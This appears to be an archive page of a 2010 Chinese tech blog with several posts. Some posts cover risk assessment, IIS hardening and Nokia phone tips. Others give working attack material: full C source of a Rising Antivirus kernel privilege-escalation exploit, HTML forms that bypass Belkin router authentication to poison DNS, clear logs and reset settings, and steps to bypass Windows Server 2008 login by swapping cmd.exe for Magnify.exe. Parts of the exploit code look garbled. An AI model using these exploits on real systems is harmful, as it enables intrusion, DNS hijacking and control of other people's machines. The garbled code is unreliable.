国内网络安全风险评估市场与技术操作

2010年2月1日 Chinadu 1 条评论 54 views

近两年网络安全风险评估渐渐为人们所重视,不少大型企业尤其是运营商、金 融业都请了专业公司进行评估。本文提出作者个人对国内安全风险评估操作的一些评价,并试图阐述作者所理解的,可裁剪、易操作的风险评估方式。由于内容与商 业公司有关,因此不可避免会涉及部份商业利益,在文中作者尽量隐去可能产生直接利害关系的文字,并声明所有评价纯属个人观点,如果你有不同意见,欢迎来函 探讨。

1. 什么是风险评估

说起风险评估,大家脑海中首先浮现的可能是:风险、资产、影响、威胁、弱点等一连串的术语,这些术语看起来并不难理解,但一旦综合考虑就会象绕口令般组 合。比如风险,用ISO/IEC TR 13335-1:1996中的定义可以解释为: 特定威胁利用某个(些)资产的弱点,造成资产损失或破坏的潜在可能性。

为了帮助理解,我们举一个下里巴人的例子:我口袋里有100块钱,因为打瞌睡,被小偷偷走了,搞得晚上没饭吃。

用风险评估的观点来描述这个案例,我们可以对这些概念作如下理解:

风险 = 钱被偷走
资产 = 100块钱
影响 = 晚上没饭吃
威胁 = 小偷
弱点 = 打瞌睡

回到阳春白雪来,假设这么个案例:某证券公司的数据库服务器因为存在RPC DCOM的漏洞,遭到入侵者攻击,被迫中断3天。

让我们尝试做一道小学时常做的连线题,把左右两边相对应的内容用线段连接起来:

风险		RPC DCOM漏洞
资产		服务器遭到入侵
影响		数据库服务器
威胁		入侵者
弱点		中断三天

如果这道题对你没什么难度,那么恭喜你,你已经和国内大多数风险评估的操作者差不多站在同一个起跑线上了。

阅读全文...

分类: 技术文章 标签:

瑞星本地提权通杀利用代码

2010年1月31日 Chinadu 没有评论 50 views

编译后,运行此程序,可在ring3下直接恢复其ssdt,然后就可以为所欲为了,刚才测试1月28日对瑞星2010版有效,据说也适用于2009和 2008版本

//MY Blog:http://hi.baidu.com/9908006

//MY QQ:165659238

//VC-ConsoleWithApi

#include "stdafx.h"

#include "windows.h"

enum { SystemModuleInformation = 11 };

typedef struct {

ULONG Unknown1;

ULONG Unknown2;

PVOID Base;

ULONG Size;

ULONG Flags;

USHORT Index;

USHORT NameLength;

USHORT LoadCount;

USHORT PathLength;

CHAR ImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {

ULONG Count;

SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

HANDLE g_RsGdiHandle = 0 ;

void __stdcall WriteKVM(PVOID Address , ULONG Value)

{

ULONG ColorValue = Value ;

ULONG btr ;

ULONG ColorBuffer = 0 ;

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

&ColorBuffer ,

sizeof(ULONG),

&btr ,

0

);

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

Address ,

sizeof(ULONG),

&btr ,

0

);

return ;

}

void AddCallGate()

{

ULONG Gdt_Addr;

ULONG CallGateData[0x4];

ULONG Icount;

__asm

{

push edx

sgdt [esp-2]

pop edx

mov Gdt_Addr , edx

}

__asm

{

push 0xc3

push Gdt_Addr

call WriteKVM

mov eax,Gdt_Addr

mov word ptr[CallGateData],ax

shr eax,16

mov word ptr[CallGateData+6],ax

mov dword ptr[CallGateData+2],0x0ec0003e8

mov dword ptr[CallGateData+8],0x0000ffff

mov dword ptr[CallGateData+12],0x00cf9a00

xor eax,eax

LoopWrite:

mov edi,dword ptr CallGateData[eax]

push edi

mov edi,Gdt_Addr

add edi,0x3e0

add edi,eax

push edi

mov Icount,eax

call WriteKVM

mov eax,Icount

add eax , 0x4

cmp eax,0x10

jnz LoopWrite

}

return ;

}

void IntoR0(PVOID function)

{

WORD Callgt[3];

Callgt[0] = 0;

Callgt[1] = 0;

Callgt[2] = 0x3e3;

__asm

{

call fword ptr[Callgt]

mov eax,esp

mov esp,[esp+4]

push eax

call function

pop esp

push offset ring3Ret

retf

ring3Ret:

nop

}

return ;

}

#pragma pack(1)

typedef struct _IDTR

{

SHORT IDTLimit;

UINT IDTBase;

}IDTR,

*PIDTR,

**PPIDTR;

#pragma pack()

ULONG g_RealSSDT = 0 ;

ULONG ServiceNum = 0 ;

ULONG OrgService [0x1000] ;

ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)

{

ULONG Offset = Rva, Limit;

IMAGE_SECTION_HEADER *Img;

WORD i;

Img = IMAGE_FIRST_SECTION(NT);

if (Rva < Img->PointerToRawData)

return Rva;

for (i = 0; i < NT->FileHeader.NumberOfSections; i++)

{

if (Img.SizeOfRawData)

Limit = Img.SizeOfRawData;

else

Limit = Img.Misc.VirtualSize;

if (Rva >= Img.VirtualAddress &&

Rva < (Img.VirtualAddress + Limit))

{

if (Img.PointerToRawData != 0)

{

Offset -= Img.VirtualAddress;

Offset += Img.PointerToRawData;

}

return Offset;

}

}

return 0;

}

#define ibaseDD *(PDWORD)&ibase

DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)

{

PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;

if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];

if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));

*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));

if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;

*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));

return TRUE;

}

typedef struct {

WORD offset:12;

WORD type:4;

} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))

DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)

{

PIMAGE_FILE_HEADER pfh;

PIMAGE_OPTIONAL_HEADER poh;

PIMAGE_SECTION_HEADER psh;

PIMAGE_BASE_RELOCATION pbr;

PIMAGE_FIXUP_ENTRY pfe;

DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;

BOOL bFirstChunk;

GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&

(!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);

bFirstChunk=TRUE;

while (bFirstChunk || pbr->VirtualAddress) {

bFirstChunk=FALSE;

pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {

if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {

dwFixups++;

dwPointerRva=pbr->VirtualAddress+pfe->offset;

dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

if (dwPointsToRva==dwKSDT)

{

if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)

{

dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;

*ImageBase = poh->ImageBase;

return dwKiServiceTable;

}

}

}

}

*(PDWORD)&pbr+=pbr->SizeOfBlock;

}

}

return 0;

}

DWORD CR0Reg ;

ULONG realssdt ;

void InKerneProc()

{

__asm

{

cli

mov eax, cr0

mov CR0Reg,eax

and eax,0xFFFEFFFF

mov cr0, eax

}

int i;

for (i = 0; i < (int)ServiceNum; i++)

{

*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService;

}

__asm

{

mov eax, CR0Reg

mov cr0, eax

sti

}

}

int main(int argc, char* argv[])

{

printf("Rising AntiVirus 2008 ~ 2010 n"

"Local Privilege Escalation Vulnerability Proof Of Concept Exploitn 2010-1-27n");

g_RsGdiHandle = CreateFile("[url=]\\.\RSNTGDI[/url]" ,

0,

FILE_SHARE_READ | FILE_SHARE_WRITE ,

0,

OPEN_EXISTING , 0 , 0 );

if (g_RsGdiHandle == INVALID_HANDLE_VALUE)

{

return 0 ;

}

SYSTEM_MODULE_INFORMATION ModuleInfo ;

// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address

HMODULE hlib = GetModuleHandle("ntdll.dll");

PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");

ULONG infosize = sizeof(ModuleInfo);

__asm

{

push 0

push infosize

lea eax , ModuleInfo

push eax

push 11

call pNtQuerySystemInformation

}

HMODULE KernelHandle ;

LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

// Load the kernel image specified

KernelHandle = LoadLibrary(ntosname);

if (KernelHandle == 0 )

{

return 0 ;

}

ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

if (KeSSDT == 0 )

{

return 0 ;

}

ULONG ImageBase = 0 ;

ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);

if (KiSSDT == 0 )

{

return 0 ;

}

KiSSDT += (ULONG)KernelHandle;

ServiceNum = 0x11c ;

ULONG i ;

for (i = 0 ; i < ServiceNum ; i ++)

{

OrgService = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;

}

realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

AddCallGate();

IntoR0(InKerneProc);

return 0;

}

分类: 技术文章 标签: , ,

ASP.NET+Win2003虚拟主机安全设置

2010年1月27日 Chinadu 没有评论 26 views

我们举例详细说明在运行ASP.NET的 windows 2003虚拟主机上,对于多个ASP.NET站点的安全配置;
在这里,我们的站点目录放在D盘的www文件夹,假设现在有一个名叫fesend的虚拟主机用户,我们在www文件夹下建立 fesend 的文件夹来存放此用户的站点数据

其中要用到以下组及帐号:
IIS_WPG 组(也称为 IIS 工作进程组,IIS Worker Process Group)
Guests组 (来宾组,在系统中拥有最少的权限)

Internet 来宾帐户 (匿名访问 Internet 信息服务的内置帐户)
启动 IIS 进程帐户 (用于启动进程外应用程序的 Internet 信息服务的内置帐户)
阅读全文...

分类: 技术文章 标签: , ,

5800备份和恢复资料

2010年1月22日 Chinadu 没有评论 295 views

1、备份

按功能表----》应用程序----》

阅读全文...

分类: 技术文章 标签: ,

5800详细刷机步骤

2010年1月22日 Chinadu 没有评论 191 views

>>>>>>>>>>>>>>>>>>>>升级存在一定风险,使用前请三思.<<<<<<<<<<<<<<<<<<<

一、了解5800MX其本知识

1、5800MX频段

RM-427:只支持GSM 900/1800
RM-356:HSDPA,WCDMA  900/2100
RM-428:HSDPA,WCDMA  850/1900

2、销售地区

RM-356:销售地区包括香港、亚太、欧洲等。
RM-428:美版,不能用国内的3G(W-CDMA),销售地区包括北美、南美、澳洲等。
RM-427:国行(包括定制机),无WLAN、3G。专为中国设计。

3、快捷键

*#06#     查询IMEI号码 所有手机
*#0000#   查询当前软件版本号  所有手机通用
*#2820# 查询蓝牙设备地址   S60和S40手机通用
*#7370#   格式化手机(原始密码12345)

二、可升级Code

1、升级V31有中文Code,已测试,
阅读全文...

分类: 技术文章 标签: ,

贝尔金无线路由器漏洞

2010年1月22日 Chinadu 没有评论 42 views

<html>

<head>

</head>

<body>

<b>这个HTML代码可以绕过webinterface密码保护的贝尔金无线路由器+ADSL2调制解调器<br>

它的工作模式F5D7632-4V6与升级固件6.01.08</b>

<br>

<form action="http://192.168.2.1/cgi-bin/setup_dns.exe" name=dnspoison method=post>

改变DNS域名服务器(IP可以不一样)<br>

<input name=page type=hidden value="setup_dns">

<input name=logout type=hidden value="">

<input name=auto_from_isp type=hidden value="0">

<input name=dns1_1 type=text value="1">

<input name=dns1_2 type=text value="2">

<input name=dns1_3 type=text value="3">

<input name=dns1_4 type=text value="4">

<br>

<input name=dns2_1 type=text value="1">

<input name=dns2_2 type=text value="2">

<input name=dns2_3 type=text value="3">

<input name=dns2_4 type=text value="5">

<br>

<input name=submit type=submit value="放毒">

</form>

<br>

<br>

<form action="http://192.168.2.1/cgi-bin/statusprocess.exe" name=clearlog method=post>

清除日志文件<br>

<input name=securityclear type=submit value="清除">

</form>

<br>

<br>

<form ACTION="http://192.168.2.1/cgi-bin/system_all.exe" method=post name=changepassword>

改变时间、密码(如果您有旧的密码)、远程管理、UPnP<br>

和自动固件更新(美好的结合DNS中毒)<br>

<input type="hidden" name="restart_time" value="0">

<input type="hidden" name="reload" value="1">

<input type="hidden" name="restart_page" value='document.location.href="system.stm";'>

<input type="hidden" name="location_page" value="system.stm">

<input type="hidden" name="server1" value="">

<input type="hidden" name="server2" value="">

<!-- for clock -->

<input type="hidden" name="year" value="">

<input type="hidden" name="mon" value="">

<input type="hidden" name="day" value="">

<input type="hidden" name="hour" value="">

<input type="hidden" name="min" value="">

<input type="hidden" name="sec" value="">

<br>旧密码<br>

<input type="password" size="12" maxlength="12" name="userOldPswd" value="">

<br>新密码,两次<br>

<input type="password" size="12" maxlength="12" name="userNewPswd" value="">

<input type="password" size="12" maxlength="12" name="userConPswd" value="">

<br>登录超时(1-99分钟)<br>

<input type="text" name="timeout" size="3" maxlength="3" value="10">

<br> 时间和时区:<br>

夏令: <br>

<input type="checkbox" name="daylight" value="1">时区(号码)<br>

<input type="text" name="time_zone" value="26">

<input type="checkbox" name="enable_ntp" value="1">启用自动时间服务器维护<br>

<tr>

<td width="240">主服务器</td>

<td width="360">

<select name="time1">

<option>132.163.4.102 - North America</option>

<option>192.5.41.41 - North America</option>

<option>192.5.41.209 - North America</option>

<option>207.200.81.113 - North America</option>

<option>208.184.49.9 - North America</option>

<option>129.132.2.21 - Europe</option>

<option>130.149.17.8 - Europe</option>

<option>128.250.36.3 - Australia</option>

<option>137.189.8.174 - Asia Pacific</option>

</select>

</td>

</tr>

<tr>

<td width="240">副服务器</td>

<td width="360">

<select name="time2">

<option>132.163.4.102 - North America</option>

<option>192.5.41.41 - North America</option>

<option>192.5.41.209 - North America</option>

<option>207.200.81.113 - North America</option>

<option>208.184.49.9 - North America</option>

<option>129.132.2.21 - Europe</option>

<option>130.149.17.8 - Europe</option>

<option>128.250.36.3 - Australia</option>

<option>137.189.8.174 - Asia Pacific</option>

</select>

</td>

</tr>

<br>远程管理:<br>

<input type="checkbox" name="allow_all" value="1">任何IP地址都可以远程管理路由器<br>

只有这个IP地址可以远程管理路由器<br>

<input name="IP1" size="3" maxlength="3" value="0">.

<input name="IP2" size="3" maxlength="3" value="0">.

<input name="IP3" size="3" maxlength="3" value="0">.

<input name="IP4" size="3" maxlength="3" value="0">

<br> 远程端口:

<input name="REMOTEPORT" size="5" maxlength="5" value="0">

<br>NAT 授权:<br>

<input type=radio name=Nat_enable value=1>授权<br>

<input type=radio name=Nat_enable value=0>废除<br>

<br>UPnP<br>

<input type="radio" name="upnp_enable" value=1>授权<br>

<input type=radio name=upnp_enable value=0>废除<br>

<br>自动更新固件<br>

<input type="radio" name="autoUpdate_enable" value=1>授权<br>

<input type="radio" name="autoUpdate_enable" value=0>废除<br>

</form>

<form method="POST" action="http://192.168.2.1/cgi-bin/restore.exe" name="RebootForm">

<br>恢复出厂默认值(包括密码)<br>

<input type="hidden" name="page" value="tools_restore">

<input type="hidden" name="logout">

<input type="submit" value="恢复默认值" style="{width:120px;}" class="submitBtn">

</form>

</body>

</html>

分类: 技术文章 标签:

绕过 Windows Server 2008的密码保护

2010年1月22日 Chinadu 没有评论 32 views

Windows Server 2008是微软Windows服务器产品中最新的操作系统版本。它是基于Windows NT 6.0 SP1的内核。
Microsoft详细信息:http://www.microsoft.com/china/windowsserver2008/

虽然与早期版本相比非常安全,但它可以很容易地绕过密码保护进入主机。
在本文中,我将展示一个简单而有效的方法绕过Windows Server 2008的密码保护。


概念演示:
为了能够绕过密码保护,我们首先需要添加PING CD盘(http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso)或其他支持 NTFS-3G驱动的Linux Live光盘(NTFS-3G是一个跨平台执行的Windows NTFS文件系统,支持读/写能力)。

我们首先检查哪个分区是Windows NTFS分区,在这个例子中是/dev/sd1。
fdisk –l | grep NTFS

然后,我们创建目录,将安装Windows文件:
mkdir –p /mnt/windows

因此,我们将Windows分区中的NTFS-3G驱动挂载到/mnt/Windows目录中:
mount –t ntfs-3g /dev/sda1/mnt/windows

现在,我们将一个可执行文件cmd.exe替换为Magnify.exe文件:
mv Magnify.exe Magnify.bck
cp cmd.exe Magnify.exe

阅读全文...

分类: 技术文章 标签:

IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告

2010年1月20日 Chinadu 没有评论 89 views

谷歌,Adobe和其他大公司有针对性的攻击的消息上周已经被披露,最初安全人员们预计是采用恶意的PDF文件进行攻击,但在上周四,微软承认攻击是由一个Internet Explorer中新的安全漏洞引发。
目前已经检测到针对此漏洞的攻击代码正在蔓延,相应的恶意代码页面也已经出现,安全研究机构WebSense今日发出安全警告,以下是技术分析截图:

http://www.4shell.org/wp-content/uploads/images/2010/01/10114162i.png
阅读全文...

分类: 业界资讯 标签: ,

5800 C盘各文件夹介绍以及存储卡的文件夹说明

2010年1月20日 Chinadu 没有评论 43 views

1. C盘文件的具体介绍
C盘文件的具体介绍·(E盘文件的原理和C盘基本一样)·
Images 图像,图片存储文件夹
Sounds 声音片段,包含两个子文件夹
Sounds/Simple 铃声
Sounds/Digital 数字声音
Videos 视频片段,视频文件存储文件夹
Others 其他
System 是手机安装文件的系统文件夹下面对它里面的文件和文件夹做下具体的介绍:
Apps 存放的是安装软件程序的文件夹。
Apps/Phone 是更改网标后形成的文件夹,此目录中还有oplogo的子目录,bmp文件就存在这个目录里,删除这个文件就可以恢复手机默认的网标。
bootdata 存放的是手机导入数据,最好不要删除或者修改里面的文件。
Data 存放的是如ini、dat、cdr等后缀的文件,这些是程序所保存设置的数据,最好不要删除或者修改里面的文件。
dataNotepad.dat 存放的是记事本中的内容。
databackgroundimage.mbm 存放的是桌面墙纸图片文件。
dataApplications.dat 存放的是程序数据文件。
datawapstore 存放的是用WAP上网时的一些设定和网页缓存。
systemDataCLOCKAPP.dat 存放的是时钟设定存档文件。
systemDataCntModel.ini 存放的是电话本初始化文件。
systemDataContacts.cdb 存放的是电话本数据文件。
systemDataLogdbu.dat 手机的通讯数据文件。
systemDatamedialPlayer.dat 自带的RealOne播放机。
systemDatamms_seting.Dat 彩信的设置。
systemDataPinboard 捷径。
systemDataCalcsoft 自带的计算器。
systemDataCalendar 自带的日历。
DataTemplate.n01 存放的是手机短信信模版文件。
DataUnitConverter.int 手存放的是单位转换器初始化文件。
DataBookmarks.db 存放的是书签数据文件,用来记录WAP地址。
DataCACerts.dat 存放的是安装各种软件的证书文件。
Mail 目录下存放着短消息、彩信、电子邮件以及相关的一些设置文件。
SKINS 存放的是主题文件。
Shareddata 存放的是一些程序运行后的写入设置数据。
Temp和YReg 存放的是些临时目录。
Libs 目录里存放着软件相关的dll文件。
midp 存放的是安装的java程序。
Mtm 是有关信息设置的目录
Programs 存放的是一些自动加载的程序文件。
Recogs 存放的是关联方式文件的目录。
Schedules 存放的是一些计划任务类的文件。
favourites 存放的是收藏夹的文件,可移动到E盘的System中,收藏夹是不会受到影响。
install 存放的是软件的安装记录,其中install log文件可以删除,而带有sis后缀的文件最好不要删除,以免以后不能在程序管理里看到并删除程序了。
Magic101 在安装MGS平台的程序以后以后才会生成。
System.ini 系统初始化配置文件,可以删除,但是下次开机使用程序,系统还会再次生成。
Backup.xml 存放的是备份数据
**注意** C盘里面大多是系统文件,不知道它是究竟什么,以及具体的作用是什么,最好不要删除,以免删错了以后,导致手机的一些程序不能正常运行。
阅读全文...

分类: 资源共享 标签: ,

手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】

2010年1月19日 Chinadu 没有评论 88 views

现在越来越多的人在迅雷上看电影了。我也很喜欢,但是我很不喜欢迅雷看看上的15秒广告。当然,也有迅雷工具的广告也很麻烦。于是,我就在网络上搜罗了一翻,找到了一些迅雷屏蔽的技巧。
[修改时,请先将迅雷程序关闭!]

1. 去除迅雷看看15秒广告

在 C:WINDOWSsystem32driversetc 目录下,用记事本打开 hosts 文件。

复制内容到剪贴板 程序代码
找到
127.0.0.1 localhost
在之后加入
------ 屏蔽迅雷看看广告 ------
0.0.0.0 pubstat.sandai.net
0.0.0.0 mcfg.sandai.net
0.0.0.0 biz5.sandai.net
0.0.0.0 float.sandai.net
0.0.0.0 recommend.xunlei.com
0.0.0.0 cl.kankan.xunlei.com

2. 禁止迅雷偷偷上传
阅读全文...

分类: 技术文章 标签: ,